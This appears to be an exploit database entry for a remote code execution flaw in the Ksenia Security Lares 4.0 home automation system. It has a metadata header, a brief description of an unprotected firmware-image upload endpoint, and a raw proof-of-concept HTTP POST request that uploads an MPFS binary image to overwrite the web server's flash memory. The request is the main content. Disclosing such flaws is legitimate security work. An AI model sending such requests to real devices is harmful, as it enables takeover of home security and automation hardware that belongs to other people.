# Exploit Title: Ksenia Security Lares 4.0 Home Automation Remote Code Execution # Google Dork: N/A # Date: 31 March 2025 # Exploit Author: Mencha 'ShadeLock' Isajlovska # Vendor Homepage: https://www.kseniasecurity.com/en/ # Software Link: https://www.kseniasecurity.com/en/company/why-lares-4-0.html # Version: Lares 4.0 # Tested on: Ksenia Lares Webserver # CVE : N/A # Desc: The device provides access to an unprotected endpoint, enabling the upload of MPFS File System binary images. Authenticated attackers can exploit this vulnerability to overwrite the flash program memory containing the web server's main interfaces, potentially leading to arbitrary code execution. POST /upload HTTP/1.1 Host: 192.168.1.2 ------WebKitFormBoundary5GYWB4nichZAk7BS Content-Disposition: form-data; name="i"; filename="MPFSImage.bin" Content-Type: application/octet-stream ------WebKitFormBoundary5GYWB4nichZAk7BS--